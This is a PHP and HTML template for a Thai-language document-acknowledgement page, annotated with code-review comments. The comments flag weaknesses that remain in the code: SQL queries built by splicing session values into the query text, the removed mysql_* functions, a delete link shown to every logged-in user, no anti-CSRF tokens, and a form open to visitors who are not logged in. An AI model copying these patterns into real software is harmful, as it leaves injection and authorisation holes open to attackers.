<script type="text/javascript">
// Hides the element exposed as `emotion1` and reveals `emotion2`.
// Both are looked up as bare globals; neither element is declared in the
// markup of this file, so they must be provided by the including page.
function showemotion() {
	var setDisplay = function (panel, value) {
		panel.style.display = value;
	};
	setDisplay(emotion1, 'none');
	setDisplay(emotion2, '');
}
// Reverse of showemotion(): reveals `emotion1` and hides `emotion2`.
// Both are looked up as bare globals supplied by the surrounding page.
function closeemotion() {
	var setDisplay = function (panel, value) {
		panel.style.display = value;
	};
	setDisplay(emotion1, '');
	setDisplay(emotion2, 'none');
}

// Appends the given emoticon code, padded with one space on each side, to the
// COMMENT field of form2 and then moves keyboard focus to that field.
// NOTE(review): the form2 declared further down in this file has no COMMENT
// field, so this helper looks like a leftover from another view — confirm.
function emoticon(theSmilie) {
	var commentField = document.form2.COMMENT;
	commentField.value = commentField.value + (' ' + theSmilie + ' ');
	document.form2.COMMENT.focus();
}
</script>
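	<TABLE cellSpacing=0 cellPadding=0 width=400 border=0>
        <TR>
       </TD>
          <TD >
<?php
/*
 * Detail view for one tkk9 record, selected by ?id=. It prints the topic, up to
 * four attached files, the names of everyone who has already acknowledged
 * receipt, and a form that registers a new acknowledgement.
 *
 * Names used here but defined outside this file: $db, FixQuotes(), sql_error()
 * and the DB_* / TB_* constants.
 *
 * Review notes
 *  - Values coming from the database or the session are escaped where they are
 *    printed; previously they were written into the HTML as-is, so any markup
 *    stored in a topic, file name or registrant name would have been rendered.
 *  - Array keys are quoted and the full <?php tag is used, so the template no
 *    longer depends on undefined-constant fallback or on short_open_tag.
 *  - The text-file handle is now closed, and closedb() is only called after a
 *    matching connectdb().
 *  - Still open (needs code outside this file): the mysql_* extension used
 *    below no longer exists in PHP 7+; the delete link and the acknowledgement
 *    form carry no anti-CSRF token that is visible here.
 */

// Escapes a value for HTML text and for quoted attribute values.
// ISO-8859-1 is passed on purpose: the page encoding is not visible in this
// file, and a byte-wise escape of & < > " ' is valid for any ASCII-compatible
// encoding, whereas a wrong multi-byte charset makes htmlspecialchars() return
// an empty string. double_encode is off so that values an input filter may
// already have entity-encoded are not mangled — TODO confirm how they are stored.
$tkk9Esc = function ($value) {
	return htmlspecialchars((string) $value, ENT_QUOTES, 'ISO-8859-1', false);
};

// The record id is the only request value used in the queries below; force it
// to an integer once so it is inert inside the SQL text and the form action.
$_GET['id'] = isset($_GET['id']) ? intval($_GET['id']) : 0;

// Show the news / announcement record
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res['tkk9'] = $db->select_query("SELECT * FROM ".TB_TKK9." WHERE id='".$_GET['id']."' ");
$arr['tkk9'] = $db->fetch($res['tkk9']);
$db->closedb ();
if(empty($arr['tkk9']['id'])){
	echo "<BR><BR><BR><BR><CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\" ><BR><BR><B>ไม่มีเรื่อง</B></CENTER><BR><BR><BR><BR>";
}else{
	// Body text lives in a side file named after the record's post_date.
	// $Detail is not printed anywhere in this file; it is kept in case the
	// including page reads it.
	$Filetkk9Topic = "tkk9data/".$arr['tkk9']['post_date'].".txt";
	$content = false;
	$file_open = @fopen($Filetkk9Topic, "r");
	if ($file_open !== false) {
		$content = @fread ($file_open, @filesize($Filetkk9Topic));
		fclose($file_open);
	}
	$Detail = stripslashes(FixQuotes($content));

	// Increment the view counter
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$q['Pageview'] = "UPDATE ".TB_TKK9." SET pageview = pageview+1 WHERE id = '".$_GET['id']."' ";
	$sql['Pageview'] = mysql_query ( $q['Pageview'] ) or sql_error ( "db-query",mysql_error() );

	$db->closedb ();

	// post_date ends up inside a JavaScript string inside a javascript: URL
	// inside an HTML attribute. Only characters that are inert in all of those
	// layers are emitted (presumably the value is a numeric timestamp — confirm).
	$tkk9Prefix = preg_replace('/[^A-Za-z0-9_-]/', '', (string) $arr['tkk9']['post_date']);
?>
					<table width="400" border="0" cellspacing="0" cellpadding="0">
	<tr>
<td width="200" valign="top" bgcolor="#FFFFCC"><B><FONT COLOR="#990000" size=2>
<?php
	// The original comment calls this the admin icon, but the condition is the
	// ordinary user session key, so every logged-in user gets the delete link.
	// NOTE(review): the delete handler is not in this file; it has to enforce
	// authorisation itself, require POST plus an anti-CSRF token, and derive the
	// file prefix from the record rather than from the query string.
	if(!empty($_SESSION['user_user'])){
?>
				  <a href="javascript:Confirm('?name=tkk9&file=addbook&op=tkk9_del&id=<?= (int) $arr['tkk9']['id'] ?>&prefix=<?= $tkk9Prefix ?>','คุณมั่นใจในการลบหัวข้อนี้ ?');"><img src="images/admin/trash.gif"  border="0" alt="ลบ" >ลบ</a>
<?php
	}
?>
</FONT></B></td>
				  <tr>
    <td width="400" bgcolor="#00ffcc" colspan="5"><B><FONT COLOR="#000066" size=2>เรื่อง : <?= $tkk9Esc($arr['tkk9']['topic']) ?> (<?= (int) $arr['tkk9']['pageview'] ?>)</B><BR><BR>
<?php
	// Up to four attachments are stored in these columns; link only those set.
	$tkk9FileColumns = array('full_text', 'full_texts', 'full_textu', 'full_texto');
	foreach ($tkk9FileColumns as $tkk9FileIndex => $tkk9FileColumn) {
		if (!empty($arr['tkk9'][$tkk9FileColumn])) {
?>
<a href="tkk9/<?= $tkk9Esc($arr['tkk9'][$tkk9FileColumn]) ?>" target="_blank"><b>ไฟล์ที่ <?= $tkk9FileIndex + 1 ?></b></A>
<?php
		}
	}
?>
	</td>
				 <tr>
	 <td valign="top" align="center" bgcolor="#00ff99" ><FONT COLOR="#990000" size=2>ผู้ที่รับหนังสือแล้ว</font><br><br>
	 <TABLE cellSpacing=0 cellPadding=0 width=200 valign="top" border=0 align="center" >
<?php
	// List everyone who has acknowledged this record, oldest first.
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res['comment'] = $db->select_query("SELECT * FROM ".TB_TKK9_COMMENT." WHERE tkk9_id='".(int) $arr['tkk9']['id']."' ORDER BY id ");
	$count=0;
	while($arr['comment'] = $db->fetch($res['comment'])){
		$count  ++;
?>
<tr>
<td>
<FONT COLOR="#000066" size=2><center><?= $tkk9Esc($arr['comment']['name']) ?></center></font>
</td>
  </tr>

<?php
	}
	// Closed inside the branch that opened the connection; the not-found
	// branch above has already closed its own.
	$db->closedb ();
}
?>	<!-- Enable Comment -->
 </table>
 </td>
  </tr>
<?php
// Look up the display names of the logged-in admin and/or user for the
// acknowledgement form. One connection serves both lookups and is closed
// afterwards, like every other query in this file.
// NOTE(review): both queries splice a session value straight into the SQL
// text. Whether those values were validated when the session was created is
// not visible here; the $db wrapper should offer bound parameters, or the
// values must be escaped for the active connection.
$tkk9AdminLogin = isset($_SESSION['admin_user']) ? $_SESSION['admin_user'] : '';
$tkk9UserLogin = isset($_SESSION['user_user']) ? $_SESSION['user_user'] : '';

//CheckUser($_SESSION['admin_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res['admin'] = $db->select_query("SELECT * FROM ".TB_ADMIN." WHERE username='".$tkk9AdminLogin."' ");
		$arr['admin'] = $db->fetch($res['admin']);

//CheckUser($_SESSION['user_user']);
		$res['user'] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$tkk9UserLogin."' ");
		$arr['user'] = $db->fetch($res['user']);
		$db->closedb ();

		$tkk9AdminName = isset($arr['admin']['name']) ? $arr['admin']['name'] : '';
		$tkk9UserName = isset($arr['user']['name']) ? $arr['user']['name'] : '';

// NOTE(review): the registrant's name travels in a hidden field, which the
// person submitting the form can change before posting. The comment handler
// (not in this file) should take the name from the session, not from POST.
// Both CheckUser() calls above are commented out, so this form is rendered
// for visitors who are not logged in as well.
		?>
			<TABLE bgcolor="#00ffcc" cellSpacing=0 cellPadding=0 width=400 border=0 align="center">
			  <TBODY>				
				  <TD>
						<FORM NAME="form2" METHOD=POST ACTION="?name=tkk9&file=comment&id=<?= (int) $_GET['id'] ?>">
						<TABLE cellSpacing=0 cellPadding=0 width=400 border=0 align="center">						
						<TR>
							<TD align="center"><INPUT TYPE="hidden" NAME="NAME" style="width:150; color: #FF0000" VALUE="<?= $tkk9Esc($tkk9AdminName) ?> <?= $tkk9Esc($tkk9UserName) ?> " readonly><br><INPUT TYPE="submit" value=" บันทึกลงทะเบียนรับ ">
							</TD>
						</TR>
						</TABLE>
						</FORM>

			</TABLE>
			<!-- End tkk9 -->	
			
		  </TD>
        </TR>
      </TBODY>
    </TABLE>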
